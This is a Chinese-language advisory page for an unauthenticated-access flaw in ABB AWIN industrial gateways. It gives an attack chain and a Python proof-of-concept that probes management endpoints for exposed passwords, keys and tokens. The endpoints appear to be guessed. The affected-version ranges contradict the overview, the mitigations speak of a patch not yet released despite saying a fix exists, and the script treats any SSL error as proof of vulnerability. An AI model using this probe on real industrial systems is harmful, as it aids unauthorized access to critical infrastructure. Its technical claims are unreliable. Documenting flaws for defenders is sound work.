CVE-2025-13779: ABB AWIN GW100/GW120关键功能缺少认证漏洞

漏洞信息

漏洞编号

CVE-2025-13779

漏洞类型

缺少认证

CVSS评分

8.3 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ABB AWIN GW100 rev.2, ABB AWIN GW120

漏洞概述

CVE-2025-13779是ABB（ASEA Brown Boveri）公司生产的工业网关设备中的一个高危安全漏洞。该漏洞存在于AWIN GW100 rev.2（固件版本2.0-0和2.0-1）和AWIN GW120（固件版本1.2-0和1.2-1）设备中，由于关键功能缺少适当的身份验证机制，攻击者可以通过邻接网络无需任何认证即可访问和控制设备的敏感功能。此漏洞的CVSS评分为8.3，属于高危级别，对设备的机密性和可用性造成严重影响。攻击者无需特殊权限或用户交互即可发起攻击，这大大降低了攻击门槛，使得任何能够接入目标网络的攻击者都有可能利用此漏洞。ABB公司已于2026年3月13日披露此漏洞，并提供了官方修复方案。鉴于该漏洞影响工业控制系统的关键通信网关，强烈建议受影响用户立即采取修复措施。

技术细节

该漏洞属于OWASP Top 10中的'A01:2021 - Broken Access Control'类别，具体表现为对关键功能的访问控制机制缺失。在ABB AWIN GW100和GW120网关设备中，某些管理功能或敏感操作端点未实施有效的身份验证和授权检查。攻击者可以通过构造特定的HTTP请求或使用专用工具直接调用这些未受保护的API端点。攻击路径为邻接网络（Adjacent Network），意味着攻击者需要处于与目标设备相同的网络段中，例如通过企业内网、工业控制网络或VPN接入。成功利用后，攻击者可获取设备敏感信息、修改配置参数或中断网关服务。由于工业网关设备通常负责不同网络区域之间的数据传输和协议转换，此类漏洞可能被利用来进行横向移动或发起更大规模的网络攻击。

攻击链分析

STEP 1

步骤1

攻击者获得与目标ABB AWIN网关设备的邻接网络访问权限，例如通过内网接入、ARP欺骗或网络嗅探

STEP 2

步骤2

攻击者识别目标设备的IP地址和运行服务，扫描开放的端口（默认443端口）

STEP 3

步骤3

攻击者直接向设备的关键功能端点（如/api/system/config、/api/admin/status等）发送未经认证的HTTP请求

STEP 4

步骤4

由于缺少认证机制，设备返回敏感配置信息、固件版本、网络设置或管理凭据

STEP 5

步骤5

攻击者利用获取的信息修改设备配置、获取持久化访问权限或进行横向移动攻击其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13779 PoC - ABB AWIN GW100/GW120 Missing Authentication
# Target: ABB AWIN GW100 rev.2 and AWIN GW120 devices
# Attack Vector: Adjacent Network (AV:A)
# Authentication Required: None (PR:N)

def check_vulnerability(target_ip, target_port=443):
    """
    Check if target ABB AWIN device is vulnerable to CVE-2025-13779
    Attempts to access critical functions without authentication
    """
    base_url = f"https://{target_ip}:{target_port}"
    
    # Endpoints that should require authentication
    # These are common ABB gateway management endpoints
    sensitive_endpoints = [
        "/api/system/config",
        "/api/network/settings",
        "/api/firmware/info",
        "/api/admin/status",
        "/cgi-bin/admin.cgi"
    ]
    
    print(f"[*] Scanning target: {target_ip}:{target_port}")
    print(f"[*] CVE-2025-13779 - Missing Authentication PoC")
    print("-" * 50)
    
    vulnerable = False
    
    for endpoint in sensitive_endpoints:
        try:
            # Attempt unauthenticated access
            response = requests.get(
                f"{base_url}{endpoint}",
                verify=False,
                timeout=10,
                headers={
                    'User-Agent': 'ABB-AWIN-Security-Scanner/1.0'
                }
            )
            
            if response.status_code == 200:
                # Check if sensitive data is exposed
                if any(keyword in response.text.lower() for keyword in 
                       ['password', 'config', 'firmware', 'serial', 'key', 'token']):
                    print(f"[+] VULNERABLE: {endpoint}")
                    print(f"    Status: {response.status_code}")
                    print(f"    Response length: {len(response.text)} bytes")
                    vulnerable = True
                else:
                    print(f"[*] Endpoint accessible: {endpoint} (no sensitive data)")
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Protected: {endpoint} (HTTP {response.status_code})")
            else:
                print(f"[*] Response: {endpoint} (HTTP {response.status_code})")
                
        except requests.exceptions.SSLError:
            print(f"[!] SSL Error on {endpoint} - device may be vulnerable")
            vulnerable = True
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {endpoint}: {str(e)}")
    
    print("-" * 50)
    if vulnerable:
        print("[!] Target is VULNERABLE to CVE-2025-13779")
        print("[!] Recommendation: Apply vendor patch immediately")
        return True
    else:
        print("[*] Target may not be vulnerable or is properly patched")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13779-poc.py <target_ip> [port]")
        print("Example: python cve-2025-13779-poc.py 192.168.1.100 443")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    
    check_vulnerability(target, port)

影响范围

ABB AWIN GW100 rev.2 < 2.0-0

ABB AWIN GW100 rev.2 < 2.0-1

ABB AWIN GW120 < 1.2-0

ABB AWIN GW120 < 1.2-1

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过网络访问控制列表（ACL）限制对ABB AWIN网关管理接口的访问，仅允许可信的管理IP地址访问；2）禁用设备的远程管理功能，改为通过带外管理方式访问；3）部署防火墙规则阻止来自不可信网络的敏感端口访问；4）监控网络流量，及时发现和阻止异常的访问模式；5）如果业务允许，考虑在受影响设备前部署额外的认证代理层；6）加强网络监控和日志审计，以便及时发现潜在的攻击行为。